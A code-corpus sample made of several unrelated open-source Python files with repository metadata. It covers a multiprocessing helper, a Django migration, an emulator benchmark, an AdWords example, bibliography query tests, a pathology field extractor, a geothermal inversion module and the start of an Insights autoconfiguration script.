print 'producer_count=%s consumer_count=%s' % (producer_count, consumer_count)
self._callback = callback
self.batch = batch
manager = Manager()
self.q = manager.Queue()
self.lock = manager.Lock()
self.event = manager.Event()
self._counter = manager.Value('counter', counter or 0)
self._shared = {var_name: manager.Value(var_name, var_value) for var_name, var_value in shared.iteritems()}
self.producerProcessList = [Producer() for _ in xrange(producer_count)]
self.consumerProcessList = [Consumer(fn=fn) for _ in xrange(consumer_count)]
self.pool = ProcessPool(consumer_count + producer_count)
@property
def q_size(self):
return self.q.qsize() + sum([x.q_size or 0 for x in self.producerProcessList])
@property
def counter(self):
return self._counter.value
@property
def shared(self):
return {var_name: var_value_proxy.value for var_name, var_value_proxy in self._shared.iteritems()}
def put(self, todo_list):
producer = self.producerProcessList.pop(0)
if self.batch:
producer.put(todo_list)
else:
producer.put(*todo_list)
self.producerProcessList.append(producer)
time.sleep(0.01)
def run(self, *args, **kwargs):
results = []
arg = (self.q, self.lock, self.event, self._counter, self.q_size)
kwargs.update(self._shared)
for producer in self.producerProcessList:
self.pool.apply_async(producer, arg + args, kwargs)
for consumer in self.consumerProcessList:
results.append(self.pool.apply_async(consumer, arg + args, kwargs, self._cb))
return results
def _cb(self, *args, **kwargs):
if self._callback:
self._callback(self.counter, self._shared)
def finish(self):
for producer in self.producerProcessList:
producer.finish()
self.pool.close()
time.sleep(0.03)
self.event.set()
self.pool.join()
# def work(data, counter, *args, **kwargs):
# pid = os.getpid()
# print '%s doing %s' % (pid, data)
# # counter = args[0] if len(args) > 0 else None
# if counter:
# counter.value += 1
# kwargs['var_a'].value += chr(len(kwargs['var_a'].value) + 65)
# return '%s result' % pid
#
#
# def cb(*args, **kwargs):
# print 'callback', args, kwargs
#
#
# def test():
# import random
# n = 0
# task = Task(work, 1, 3, counter=n, var_a='', callback=cb)
# results = task.run()
# for i in xrange(26):
# lines = ["%d" % i] * random.randint(10, 20)
# task.put(lines)
#
# task.finish()
#
# print 'end counter', task.counter
# print 'shared.var_a', task.shared['var_a']
# print 'results:\n' + '\n'.join([str(res.get()) for res in results])
#
# if __name__ == '__main__':
# test()
|
Vito2015/pyextend
|
pyextend/core/thread/multiprocessTask.py
|
Python
|
gpl-2.0
| 6,887 | 0.001452 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 01:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='USER',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('userid', models.CharField(max_length=200)),
('userpassword', models.CharField(max_length=200)),
('add', models.CharField(max_length=200)),
('phone', models.CharField(max_length=200)),
],
),
]
|
meliora000/eb_django_app
|
django_eb/users/migrations/0001_initial.py
|
Python
|
mit
| 796 | 0.001256 |
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import time
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
from emuvim.api.osm.kafka import Kafka
from emuvim.api.osm.lcm import LCM
from emuvim.api.osm.mongo import Mongo
from emuvim.api.osm.mysql import Mysql
from emuvim.api.osm.nbi import NBI
from emuvim.api.osm.ro import RO
from emuvim.api.osm.zookeeper import Zookeeper
from emuvim.dcemulator.net import DCNetwork
from mininet.log import setLogLevel
setLogLevel('debug')
COUNT = 15
with open('osm_component_startup_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['other', 'zookeeper', 'kafka', 'mongo', 'nbi', 'ro_db', 'ro', 'lcm']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for i in range(COUNT):
start = time.time()
net = DCNetwork(monitor=False, enable_learning=True)
api = None
try:
dc1 = net.addDatacenter("dc1")
api = OpenstackApiEndpoint("0.0.0.0", 6001)
api.connect_datacenter(dc1)
api.connect_dc_network(net)
s1 = net.addSwitch('s1')
zookeeper_ip = '10.0.0.96'
kafka_ip = '10.0.0.97'
mongo_ip = '10.0.0.98'
nbi_ip = '10.0.0.99'
ro_db_ip = '10.0.0.100'
ro_ip = '10.0.0.101'
lcm_ip = '10.0.0.102'
d1 = net.addDocker('d1', dimage='ubuntu:trusty')
VERSION = 'releasefive-daily'
zookeeper = Zookeeper(net, zookeeper_ip)
kafka = Kafka(net, kafka_ip, zookeeper_ip)
mongo = Mongo(net, mongo_ip)
nbi = NBI(net, nbi_ip, mongo_ip, kafka_ip)
ro_db = Mysql(net, ro_db_ip)
ro = RO(net, ro_ip, ro_db_ip, version=VERSION)
lcm = LCM(net, lcm_ip, ro_ip, mongo_ip, kafka_ip)
net.addLink(d1, s1)
net.addLink(zookeeper.instance, s1)
net.addLink(kafka.instance, s1)
net.addLink(mongo.instance, s1)
net.addLink(nbi.instance, s1)
net.addLink(ro_db.instance, s1)
net.addLink(ro.instance, s1)
net.addLink(lcm.instance, s1)
net.start()
api.start()
other_end = time.time()
zookeeper.start()
zookeeper_started = time.time()
kafka.start()
kafka_started = time.time()
mongo.start()
mongo_started = time.time()
nbi.start()
nbi_started = time.time()
ro_db.start()
ro_db_started = time.time()
ro.start()
ro_started = time.time()
lcm.start()
lcm_started = time.time()
writer.writerow({
'other': other_end - start,
'zookeeper': zookeeper_started - other_end,
'kafka': kafka_started - zookeeper_started,
'mongo': mongo_started - kafka_started,
'nbi': nbi_started - mongo_started,
'ro_db': ro_db_started - nbi_started,
'ro': ro_started - ro_db_started,
'lcm': lcm_started - ro_started,
})
csvfile.flush()
finally:
net.stop()
api.stop()
|
mpeuster/son-emu
|
examples/performance_measurements/osm_component_startup.py
|
Python
|
apache-2.0
| 3,883 | 0.000258 |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds an ad customizer feed.
Associates the feed with customer and adds an ad that uses the feed to populate
dynamic data.
"""
from datetime import datetime
from uuid import uuid4
# Import appropriate classes from the client library.
from googleads import adwords
from googleads import errors
FEED_NAME = 'Interplanetary Feed Name %s' % uuid4()
ADGROUPS = [
'INSERT_ADGROUP_ID_1_HERE',
'INSERT_ADGROUP_ID_2_HERE'
]
def CreateAdsWithCustomizations(client, adgroup_ids, feed_name):
"""Creates ExpandedTextAds that use ad customizations for specified AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing the AdGroup ids to add ExpandedTextAds to.
feed_name: the name of the feed used to apply customizations.
Raises:
GoogleAdsError: if no ExpandedTextAds were added.
"""
# Get the AdGroupAdService
adgroup_ad_service = client.GetService('AdGroupAdService', 'v201809')
expanded_text_ad = {
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Luxury Cruise to {=%s.Name}' % feed_name,
'headlinePart2': 'Only {=%s.Price}' % feed_name,
'description': 'Offer ends in {=countdown(%s.Date)}!' % feed_name,
'finalUrls': ['http://www.example.com'],
}
# We add the same ad to both ad groups. When they serve, they will show
# different values, since they match different feed items.
operations = [{
'operator': 'ADD',
'operand': {
'adGroupId': adgroup,
'ad': expanded_text_ad
}
} for adgroup in adgroup_ids]
response = adgroup_ad_service.mutate(operations)
if response and 'value' in response:
for ad in response['value']:
print('Created an ad with ID "%s", type "%s", and status "%s".'
% (ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
raise errors.GoogleAdsError('No ads were added.')
def CreateCustomizerFeed(client, feed_name):
"""Creates a new AdCustomizerFeed.
Args:
client: an AdWordsClient instance.
feed_name: the name for the new AdCustomizerFeed.
Returns:
The new AdCustomizerFeed.
"""
# Get the AdCustomizerFeedService
ad_customizer_feed_service = client.GetService('AdCustomizerFeedService',
'v201809')
customizer_feed = {
'feedName': feed_name,
'feedAttributes': [
{'type': 'STRING', 'name': 'Name'},
{'type': 'STRING', 'name': 'Price'},
{'type': 'DATE_TIME', 'name': 'Date'}
]
}
feed_service_operation = {
'operator': 'ADD',
'operand': customizer_feed
}
response = ad_customizer_feed_service.mutate([feed_service_operation])
if response and 'value' in response:
feed = response['value'][0]
feed_data = {
'feedId': feed['feedId'],
'nameId': feed['feedAttributes'][0]['id'],
'priceId': feed['feedAttributes'][1]['id'],
'dateId': feed['feedAttributes'][2]['id']
}
print('Feed with name "%s" and ID %s was added with:\n'
'\tName attribute ID %s and price attribute ID %s and date attribute'
'ID %s') % (feed['feedName'], feed['feedId'], feed_data['nameId'],
feed_data['priceId'], feed_data['dateId'])
return feed
else:
raise errors.GoogleAdsError('No feeds were added')
def RestrictFeedItemToAdGroup(client, feed_item, adgroup_id):
"""Restricts the feed item to an ad group.
Args:
client: an AdWordsClient instance.
feed_item: The feed item.
adgroup_id: The ad group ID.
"""
# Get the FeedItemTargetService
feed_item_target_service = client.GetService(
'FeedItemTargetService', 'v201809')
# Optional: Restrict the first feed item to only serve with ads for the
# specified ad group ID.
ad_group_target = {
'xsi_type': 'FeedItemAdGroupTarget',
'feedId': feed_item['feedId'],
'feedItemId': feed_item['feedItemId'],
'adGroupId': adgroup_id
}
operation = {'operator': 'ADD', 'operand': ad_group_target}
response = feed_item_target_service.mutate([operation])
new_ad_group_target = response['value'][0]
print('Feed item target for feed ID %s and feed item ID %s was created to '
'restrict serving to ad group ID %s' %
(new_ad_group_target['feedId'],
new_ad_group_target['feedItemId'],
new_ad_group_target['adGroupId']))
def CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed):
"""Creates FeedItems for the specified AdGroups.
These FeedItems contain values to use in ad customizations for the AdGroups.
Args:
client: an AdWordsClient instance.
adgroup_ids: a list containing two AdGroup Ids.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Raises:
GoogleAdsError: if no FeedItems were added.
"""
# Get the FeedItemService
feed_item_service = client.GetService('FeedItemService', 'v201809')
now = datetime.now()
mars_date = datetime(now.year, now.month, 1, 0, 0)
venus_date = datetime(now.year, now.month, 15, 0, 0)
time_format = '%Y%m%d %H%M%S'
feed_item_operations = [
CreateFeedItemAddOperation(
'Mars', '$1234.56', mars_date.strftime(time_format),
ad_customizer_feed),
CreateFeedItemAddOperation(
'Venus', '$1450.00', venus_date.strftime(time_format),
ad_customizer_feed)
]
response = feed_item_service.mutate(feed_item_operations)
if 'value' in response:
for feed_item in response['value']:
print('Added FeedItem with ID %d.' % feed_item['feedItemId'])
else:
raise errors.GoogleAdsError('No FeedItems were added.')
for feed_item, adgroup_id in zip(response['value'], adgroup_ids):
RestrictFeedItemToAdGroup(client, feed_item, adgroup_id)
def CreateFeedItemAddOperation(name, price, date, ad_customizer_feed):
"""Creates a FeedItemOperation.
The generated FeedItemOperation will create a FeedItem with the specified
values when sent to FeedItemService.mutate.
Args:
name: the value for the name attribute of the FeedItem.
price: the value for the price attribute of the FeedItem.
date: the value for the date attribute of the FeedItem.
ad_customizer_feed: the AdCustomizerFeed we're associating the FeedItems
with.
Returns:
A new FeedItemOperation for adding a FeedItem.
"""
feed_item = {
'feedId': ad_customizer_feed['feedId'],
'attributeValues': [
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][0]['id'],
'stringValue': name
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][1]['id'],
'stringValue': price
},
{
'feedAttributeId': ad_customizer_feed['feedAttributes'][2]['id'],
'stringValue': date
}
]
}
operation = {
'operator': 'ADD',
'operand': feed_item
}
return operation
def main(client, adgroup_ids, feed_name=FEED_NAME):
# Create a customizer feed. One feed per account can be used for all ads.
ad_customizer_feed = CreateCustomizerFeed(client, feed_name)
# Add feed items containing the values we'd like to place in ads.
CreateCustomizerFeedItems(client, adgroup_ids, ad_customizer_feed)
# All set! We can now create ads with customizations.
CreateAdsWithCustomizations(client, adgroup_ids, feed_name)
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, ADGROUPS)
|
googleads/googleads-python-lib
|
examples/adwords/v201809/advanced_operations/add_ad_customizer.py
|
Python
|
apache-2.0
| 8,193 | 0.006713 |
# coding: utf8
from __future__ import unicode_literals
import unittest
import dotdot
from pubs.query import (AuthorFilter, CitekeyFilter, FieldFilter,
YearFilter, _query_block_to_filter,
get_paper_filter, InvalidQuery)
from pubs.paper import Paper
import fixtures
doe_paper = Paper.from_bibentry(fixtures.doe_bibentry)
page_paper = Paper.from_bibentry(fixtures.page_bibentry)
turing_paper = Paper.from_bibentry(fixtures.turing_bibentry,
metadata=fixtures.turing_metadata)
class TestAuthorFilter(unittest.TestCase):
def test_fails_if_no_author(self):
no_doe = doe_paper.deepcopy()
no_doe.bibentry['Doe2013']['author'] = []
self.assertFalse(AuthorFilter('whatever')(no_doe))
def test_match_case(self):
self.assertTrue(AuthorFilter('doe')(doe_paper))
self.assertTrue(AuthorFilter('doe', case_sensitive=False)(doe_paper))
self.assertTrue(AuthorFilter('Doe')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(AuthorFilter('dOe')(doe_paper))
self.assertFalse(AuthorFilter('dOe', case_sensitive=True)(doe_paper))
self.assertFalse(AuthorFilter('doe', case_sensitive=True)(doe_paper))
self.assertTrue(AuthorFilter('dOe', case_sensitive=False)(doe_paper))
def test_match_not_first_author(self):
self.assertTrue(AuthorFilter('motwani')(page_paper))
def test_do_not_match_first_name(self):
self.assertFalse(AuthorFilter('lawrence')(page_paper))
class TestCitekeyFilter(unittest.TestCase):
def test_fails_if_no_citekey(self):
no_citekey = doe_paper.deepcopy()
no_citekey.citekey = ''
self.assertFalse(CitekeyFilter('whatever')(no_citekey))
def test_match_case(self):
self.assertTrue(CitekeyFilter('doe201')(doe_paper))
self.assertTrue(CitekeyFilter('doe201', case_sensitive=False)(doe_paper))
self.assertTrue(CitekeyFilter('Doe201')(doe_paper))
def test_do_not_match_case(self):
self.assertFalse(CitekeyFilter('dOe201')(doe_paper))
self.assertFalse(CitekeyFilter('dOe201', case_sensitive=True)(doe_paper))
self.assertFalse(CitekeyFilter('doe201', case_sensitive=True)(doe_paper))
self.assertTrue(CitekeyFilter('dOe201', case_sensitive=False)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "{G}r{\\\"u}n2013"
self.assertTrue(CitekeyFilter('Grün')(latexenc_paper))
self.assertTrue(CitekeyFilter('Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertTrue(CitekeyFilter("Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Jalape\u00f1o2013"
self.assertFalse(CitekeyFilter("Jalapen\u0303o", strict=True)(latexenc_paper))
latexenc_paper.citekey = "{G}ros2013"
self.assertFalse(CitekeyFilter("Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.citekey = "Gros2013"
self.assertFalse(
CitekeyFilter("gros", case_sensitive=False, strict=True)(latexenc_paper))
class TestCheckTag(unittest.TestCase):
pass
class TestCheckYear(unittest.TestCase):
def test_single_year(self):
self.assertTrue(YearFilter('2013')(doe_paper))
self.assertFalse(YearFilter('2014')(doe_paper))
def test_before_year(self):
self.assertTrue(YearFilter('-2013')(doe_paper))
self.assertTrue(YearFilter('-2014')(doe_paper))
self.assertFalse(YearFilter('-2012')(doe_paper))
def test_after_year(self):
self.assertTrue(YearFilter('2013-')(doe_paper))
self.assertTrue(YearFilter('2012-')(doe_paper))
self.assertFalse(YearFilter('2014-')(doe_paper))
def test_year_range(self):
self.assertTrue(YearFilter('')(doe_paper))
self.assertTrue(YearFilter('-')(doe_paper))
self.assertTrue(YearFilter('2013-2013')(doe_paper))
self.assertTrue(YearFilter('2012-2014')(doe_paper))
self.assertFalse(YearFilter('2014-2015')(doe_paper))
with self.assertRaises(ValueError):
YearFilter('2015-2014')(doe_paper)
class TestCheckField(unittest.TestCase):
def test_match_case(self):
self.assertTrue(FieldFilter('title', 'nice')(doe_paper))
self.assertTrue(
FieldFilter('title', 'nice', case_sensitive=False)(doe_paper))
self.assertTrue(FieldFilter('year', '2013')(doe_paper))
def test_do_not_match_case(self):
self.assertTrue(
FieldFilter('title', 'Title', case_sensitive=True)(doe_paper))
self.assertFalse(
FieldFilter('title', 'nice', case_sensitive=True)(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "{G}r{\\\"u}n"
self.assertTrue(
FieldFilter('title', 'Grün')(latexenc_paper))
self.assertTrue(
FieldFilter('title', 'Gr{\\\"u}n')(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertTrue(
FieldFilter('title', "Jalapen\u0303o")(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Jalape\u00f1o"
self.assertFalse(FieldFilter('title', "Jalapen\u0303o",
strict=True)(latexenc_paper))
latexenc_paper.bibentry['Doe2013']['title'] = "{G}ros"
self.assertFalse(
FieldFilter('title', "Gros", strict=True)(latexenc_paper))
def test_strict_implies_case(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = "Gros"
self.assertFalse(
FieldFilter('title', "gros", case_sensitive=False,
strict=True)(latexenc_paper))
class TestCheckQueryBlock(unittest.TestCase):
def test_raise_invalid_if_no_value(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('title')
def test_raise_invalid_if_too_much(self):
with self.assertRaises(InvalidQuery):
_query_block_to_filter('whatever:value:too_much')
class TestFilterPaper(unittest.TestCase):
def test_case(self):
self.assertTrue(get_paper_filter(['title:nice'])(doe_paper))
self.assertTrue(get_paper_filter(['title:Nice'])(doe_paper))
self.assertFalse(get_paper_filter(['title:nIce'])(doe_paper))
def test_fields(self):
self.assertTrue(get_paper_filter(['year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['year:2010-'])(doe_paper))
self.assertFalse(get_paper_filter(['year:2014'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe'])(doe_paper))
self.assertTrue(get_paper_filter(['author:Doe'])(doe_paper))
def test_tags(self):
self.assertTrue(get_paper_filter(['tag:computer'])(turing_paper))
self.assertFalse(get_paper_filter(['tag:Ai'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:AI'])(turing_paper))
self.assertTrue(get_paper_filter(['tag:ai'])(turing_paper))
def test_multiple(self):
self.assertTrue(get_paper_filter(['author:doe', 'year:2013'])(doe_paper))
self.assertTrue(get_paper_filter(['author:doe', 'year:2010-2014'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doe', 'year:2014-'])(doe_paper))
self.assertFalse(get_paper_filter(['author:doee', 'year:2014'])(doe_paper))
def test_latex_enc(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
latexenc_paper.bibentry['Doe2013']['author'][0] = r"Erd\H{o}s, Paul"
self.assertTrue(get_paper_filter(['title:El'])(latexenc_paper))
self.assertTrue(get_paper_filter(['title:Niño'])(latexenc_paper))
self.assertTrue(get_paper_filter(['author:erdős'])(latexenc_paper))
self.assertTrue(get_paper_filter(['title:{E}l'])(latexenc_paper))
def test_normalize_unicode(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"{E}l Ni{\~n}o"
self.assertTrue(get_paper_filter(['title:Nin\u0303o'])(latexenc_paper))
def test_strict(self):
latexenc_paper = doe_paper.deepcopy()
latexenc_paper.bibentry['Doe2013']['title'] = r"El Ni{\~n}o"
self.assertFalse(get_paper_filter(
['title:Nin\u0303o'], strict=True)(latexenc_paper))
if __name__ == '__main__':
unittest.main()
|
pubs/pubs
|
tests/test_queries.py
|
Python
|
lgpl-3.0
| 9,022 | 0.001331 |
'''author@esilgard'''
#
# Copyright (c) 2014-2016 Fred Hutchinson Cancer Research Center
#
# Licensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
#
from OneFieldPerReport import OneFieldPerReport
import global_strings as gb
class Pathologist(OneFieldPerReport):
''' extract the name of the pathologist who initially signed the report '''
__version__ = 'Pathologist1.0'
def __init__(self):
super(Pathologist, self).__init__()
self.field_name = 'Pathologist'
self.regex = r'\n([A-Za-z\'\-,. ]+) MD(, PhD)?[ ]*\n[ ]*Pathologist[ ]*\n'
self.confidence = 1
self.match_style = 'first'
self.table = gb.PATHOLOGY_TABLE
self.value_type = 'match'
|
esilgard/BreastMR
|
fhcrc_pathology/Pathologist.py
|
Python
|
apache-2.0
| 744 | 0.005376 |
r"""
Modeling and inversion of temperature residuals measured in wells due to
temperature perturbations in the surface.
Perturbations can be of two kinds: **abrupt** or **linear**.
Forward modeling of these types of changes is done with functions:
* :func:`~fatiando.geothermal.climsig.abrupt`
* :func:`~fatiando.geothermal.climsig.linear`
Assumeing that the temperature perturbation was abrupt. The residual
temperature at a depth :math:`z_i` in the well at a time :math:`t` after the
perturbation is given by
.. math::
T_i(z_i) = A \left[1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)\right]
where :math:`A` is the amplitude of the perturbation, :math:`\lambda` is the
thermal diffusivity of the medium, and :math:`\mathrm{erf}` is the error
function.
For the case of a linear change, the temperature is
.. math::
T_i(z_i) = A \left[
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
\right]
Given the temperature measured at different depths, we can **invert** for the
amplitude and age of the change. The available inversion solvers are:
* :class:`~fatiando.geothermal.climsig.SingleChange`: inverts for the
parameters of a single temperature change. Can use both abrupt and linear
models.
----
"""
from __future__ import division
import numpy
import scipy.special
from ..inversion.base import Misfit
from ..constants import THERMAL_DIFFUSIVITY_YEAR
def linear(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to a linear
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
The depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
tmp = zp / numpy.sqrt(4. * diffus * age)
res = amp * ((1. + 2 * tmp ** 2) * scipy.special.erfc(tmp)
- 2. / numpy.sqrt(numpy.pi) * tmp * numpy.exp(-tmp ** 2))
return res
def abrupt(amp, age, zp, diffus=THERMAL_DIFFUSIVITY_YEAR):
"""
Calculate the residual temperature profile in depth due to an abrupt
temperature perturbation.
Parameters:
* amp : float
Amplitude of the perturbation (in C)
* age : float
Time since the perturbation occured (in years)
* zp : array
Arry with the depths of computation points along the well (in meters)
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
See the default values for the thermal diffusivity in
:mod:`fatiando.constants`.
Returns
* temp : array
The residual temperatures measured along the well
"""
return amp * (1. - scipy.special.erf(zp / numpy.sqrt(4. * diffus * age)))
class SingleChange(Misfit):
r"""
Invert the well temperature data for a single change in temperature.
The parameters of the change are its amplitude and age.
See the docstring of :mod:`fatiando.geothermal.climsig` for more
information and examples.
Parameters:
* temp : array
The temperature profile
* zp : array
Depths along the profile
* mode : string
The type of change: ``'abrupt'`` for an abrupt change, ``'linear'`` for
a linear change.
* diffus : float
Thermal diffusivity of the medium (in m^2/year)
.. note::
The recommended solver for this inverse problem is the
Levemberg-Marquardt method. Since this is a non-linear problem, set the
desired method and initial solution using the
:meth:`~fatiando.inversion.base.FitMixin.config` method.
See the example bellow.
Example with synthetic data:
>>> import numpy
>>> zp = numpy.arange(0, 100, 1)
>>> # For an ABRUPT change
>>> amp = 2
>>> age = 100 # Uses years to avoid overflows
>>> temp = abrupt(amp, age, zp)
>>> # Run the inversion for the amplitude and time
>>> # This is a non-linear problem, so use the Levemberg-Marquardt
>>> # algorithm with an initial estimate
>>> solver = SingleChange(temp, zp, mode='abrupt').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 2.00 age: 100.00
>>> # For a LINEAR change
>>> amp = 3.45
>>> age = 52.5
>>> temp = linear(amp, age, zp)
>>> solver = SingleChange(temp, zp, mode='linear').config(
... 'levmarq', initial=[1, 1])
>>> amp_, age_ = solver.fit().estimate_
>>> print "amp: %.2f age: %.2f" % (amp_, age_)
amp: 3.45 age: 52.50
Notes:
For **abrupt** changes, derivatives with respect to the amplitude and age
are calculated using the formula
.. math::
\frac{\partial T_i}{\partial A} = 1 - \mathrm{erf}\left(
\frac{z_i}{\sqrt{4\lambda t}}\right)
and
.. math::
\frac{\partial T_i}{\partial t} = \frac{A}{t\sqrt{\pi}}
\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\exp\left[-\left(\frac{z_i}{\sqrt{4\lambda t}}\right)^2\right]
respectively.
For **linear** changes, derivatives with respect to the age are calculated
using a 2-point finite difference approximation. Derivatives with respect
to amplitude are calculate using the formula
.. math::
\frac{\partial T_i}{\partial A} =
\left(1 + 2\frac{z_i^2}{4\lambda t}\right)
\mathrm{erfc}\left(\frac{z_i}{\sqrt{4\lambda t}}\right) -
\frac{2}{\sqrt{\pi}}\left(\frac{z_i}{\sqrt{4\lambda t}}\right)
\mathrm{exp}\left(-\frac{z_i^2}{4\lambda t}\right)
"""
def __init__(self, temp, zp, mode, diffus=THERMAL_DIFFUSIVITY_YEAR):
if len(temp) != len(zp):
raise ValueError("temp and zp must be of same length")
if mode not in ['abrupt', 'linear']:
raise ValueError("Invalid mode: %s. Must be 'abrupt' or 'linear'"
% (mode))
super(SingleChange, self).__init__(
data=temp,
positional=dict(zp=zp),
model=dict(diffus=float(diffus), mode=mode),
nparams=2, islinear=False)
def _get_predicted(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
if self.model['mode'] == 'abrupt':
return abrupt(amp, age, zp, diffus)
if self.model['mode'] == 'linear':
return linear(amp, age, zp, diffus)
def _get_jacobian(self, p):
amp, age = p
zp = self.positional['zp']
diffus = self.model['diffus']
mode = self.model['mode']
if mode == 'abrupt':
tmp = zp / numpy.sqrt(4. * diffus * age)
jac = numpy.transpose([
abrupt(1., age, zp, diffus),
(amp * tmp * numpy.exp(-(tmp ** 2)) /
(numpy.sqrt(numpy.pi) * age))])
if mode == 'linear':
delta = 0.5
at_p = linear(amp, age, zp, diffus)
jac = numpy.transpose([
linear(1., age, zp, diffus),
(linear(amp, age + delta, zp, diffus) -
linear(amp, age - delta, zp, diffus)) / (2 * delta)])
return jac
|
eusoubrasileiro/fatiando_seismic
|
fatiando/geothermal/climsig.py
|
Python
|
bsd-3-clause
| 7,793 | 0 |
"""
Auto Configuration Helper
"""
import logging
import os
import requests
from urlparse import urlparse
from constants import InsightsConstants as constants
from cert_auth import rhsmCertificate
from connection import InsightsConnection
from config import CONFIG as config
logger = logging.getLogger(__name__)
APP_NAME = constants.app_name
def verify_connectivity():
"""
Verify connectivity to satellite server
"""
logger.debug("Verifying Connectivity")
ic = InsightsConnection()
try:
branch_info = ic.branch_info()
except requests.ConnectionError as e:
logger.debug(e)
logger.debug("Failed to connect to satellite")
return False
except LookupError as e:
logger.debug(e)
logger.debug("Failed to parse response from satellite")
return False
try:
remote_leaf = branch_info['remote_leaf']
return remote_leaf
except LookupError as e:
logger.debug(e)
logger.debug("Failed to find accurate branch_info")
return False
def set_auto_configuration(hostname, ca_cert, proxy):
"""
Set config based on discovered data
"""
logger.debug("Attempting to auto configure!")
logger.debug("Attempting to auto configure hostname: %s", hostname)
logger.debug("Attempting to auto configure CA cert: %s", ca_cert)
logger.debug("Attempting to auto configure proxy: %s", proxy)
saved_base_url = config['base_url']
if ca_cert is not None:
saved_cert_verify = config['cert_verify']
config['cert_verify'] = ca_cert
if proxy is not None:
saved_proxy = config['proxy']
config['proxy'] = proxy
config['base_url'] = hostname + '/r/insights'
if not verify_connectivity():
logger.warn("Could not auto configure, falling back to static config")
logger.warn("See %s for additional information",
constants.default_log_file)
config['base_url'] = saved_base_url
if proxy is not None:
if saved_proxy is not None and saved_proxy.lower() == 'none':
saved_proxy = None
config['proxy'] = saved_proxy
if ca_cert is not None:
config['cert_verify'] = saved_cert_verify
def _try_satellite6_configuration():
"""
Try to autoconfigure for Satellite 6
"""
try:
from rhsm.config import initConfig
rhsm_config = initConfig()
logger.debug('Trying to autoconf Satellite 6')
cert = file(rhsmCertificate.certpath(), 'r').read()
key = file(rhsmCertificate.keypath(), 'r').read()
rhsm = rhsmCertificate(key, cert)
# This will throw an exception if we are not registered
logger.debug('Checking if system is subscription-manager registered')
rhsm.getConsumerId()
